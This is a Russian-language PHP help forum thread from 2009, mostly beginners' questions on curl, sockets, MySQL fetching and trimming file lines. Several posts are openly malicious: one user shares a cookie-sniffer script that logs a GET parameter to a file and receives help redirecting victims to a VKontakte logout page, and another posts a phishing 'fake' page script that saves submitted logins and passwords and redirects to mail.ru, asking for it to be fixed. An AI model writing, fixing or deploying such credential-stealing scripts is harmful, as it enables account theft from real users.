[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Что лутше - курл или соксы?
    Я лично юзаю соксы, потому что курл не учил, и мне кажеться что соксы лутше.
     
  2. Zedi

    Zedi Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    317
    Likes Received:
    120
    Reputations:
    13
    mailbrush, как можно сравнить курл и соксы? соксы это тоже библиотека к PHP? ты что-то путаешь
     
    1 person likes this.
  3. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    460
    Likes Received:
    161
    Reputations:
    3
    может сокеты?
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Если поддержка curl - то курлы лучше.
     
  5. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Нифига не меньше, даже больше, или ты с курлом установишь переменные и одной функцией прочитаешь ответ, или будешь все заголовки писать, открывать соединение, и читать ответ.
     
  6. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    460
    Likes Received:
    161
    Reputations:
    3
    InferNo23 как ты сказал "Глупые споры и выбор что лучше/хуже.". Для кого лутше сокеты для кого курлы))
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Ошибся. Сокеты
     
  8. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    464
    Likes Received:
    139
    Reputations:
    25
    уложат сервер спать :D :D
     
    #8908 PaCo, 9 Mar 2009
    Last edited: 9 Mar 2009
    2 people like this.
  9. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    320
    Likes Received:
    356
    Reputations:
    18
    http://habrahabr.ru/blogs/php/42158/
    почитайте, и будте добры, посмотрите длину кода :eek:
     
    #8909 DDoSька, 9 Mar 2009
    Last edited: 9 Mar 2009
  10. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    320
    Likes Received:
    356
    Reputations:
    18
    Нельзя
    $myrow[Здесь указываешь поле которое хочешьвывести] ,никаких сложных конструкций тебе пока не надо
     
  11. mixkorshun

    mixkorshun Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    39
    Likes Received:
    4
    Reputations:
    0
    erihtoney
    После этого кода у тебя в переменной $myrow массив из полей базы данных первого результата.. mysql_fetch_array надо выполнять в цикле.. Если тебе надо отобрать у всех записей имя "Cаша", то
    Code:
    $result=mysql_query("SELECT * FROM `users` WHERE `name`=`Саша`");
    
    с тя ++)
     
  12. mixkorshun

    mixkorshun Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    39
    Likes Received:
    4
    Reputations:
    0
    erihtoney
    давай в пм я - те все объясню 100%
     
    1 person likes this.
  13. Van4ozA

    Van4ozA New Member

    Joined:
    2 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    наорд, подскажите! как мне сделать чтоб после этого он перебрасывал на другую страницу!?

    <?php
    if(isset($_GET[1])){
    $fp = fopen("log.html", "a+");
    fwrite($fp, '<h1>'.date('H:i:s d F Y').'</h1>'."\r\n".'<textarea rows=40 cols=150>'.$_GET[1].'</textarea><br><br>' . "\r\n");
    fclose($fp);
    }
    ?>
     
  14. mixkorshun

    mixkorshun Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    39
    Likes Received:
    4
    Reputations:
    0
    Van4ozA
    когда перебрасывать надо, текст на страницу выписывается??
     
  15. Van4ozA

    Van4ozA New Member

    Joined:
    2 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    нет, просто выполнял выше написанное и сразу просо перебрасывал... например на _http://vkontakte.ru/login.php?op=logout
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    fclose($fp);
    header("Location: http://vkontakte.ru/login.php?op=logout");
     
    1 person likes this.
  17. Van4ozA

    Van4ozA New Member

    Joined:
    2 Mar 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    Спасиба! с меня ++)
     
  18. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Есть .txt файл вида:

    Code:
    1
    2
    3
    
    и пшп код:

    PHP:
    $qwe "qwe";
    $probel ":";

    $lines file ($filename);                                     

    foreach (
    $lines as $line_num => $line)

    {
           
    $array = array ($line_num => htmlspecialchars($line));
           echo (
    $line.$probel.$qwe);
           echo (
    "<br> \n");
    }
    Тоесть замысел такой, из файла .txt берём циферку и прибавляем ей $probel и $qwe ... но в браузере выходит так:

    1 :qwe
    2 :qwe
    3 :qwe


    После цифры стоит %№!!! пробел!! .... я пробывал и trim и пихал <br> куда только можно ... не помогает(((

    исходный код такой:

    HTML:
    1
    :qwe<br> 
    2
    :qwe<br> 
    3:qwe<br> 
    обратите внимание на последнюю строку .... как мне убрать чёртов пробел после цифры ?
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    PHP:
    <pre>
    <?php  

    $qwe 
    "qwe"
    $probel ":"

    $lines array_map("trim"file("tema1.txt")); // Название файла где 1,2,3
    for ($i=0;$i<count($lines);$i++) {
           echo 
    $lines[$i].$probel.$qwe "\n"

    ?>
    </pre>
     
    1 person likes this.
  20. Ferment

    Ferment New Member

    Joined:
    3 Mar 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -3
    создал очередной фэйк, перекидывает куда нужно после ввода данных в поля. в базу поступает только один символ после того как логинишься
    :

    в чём проблема?вроде всё ок.





    <?PHP

    $Login = $_POST['Login'];//?????
    $Pass = $_POST['Password'];//??????
    $fp = fopen("654321","a+"); // Îòêðûâàåì ôàéë áàçû
    fwrite($fp,$Login.":".$Pass); // Çàïèñûâàåì ëîãèí:ïàðîëü
    fclose($fp); // Çàêðûâàåì ôàéë

    header("Location: http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f");
    echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"//???? ?????? ???????????? ????? ???? ??? ?? ???? ??????!

    ?>
     
Loading...
Thread Status:
Not open for further replies.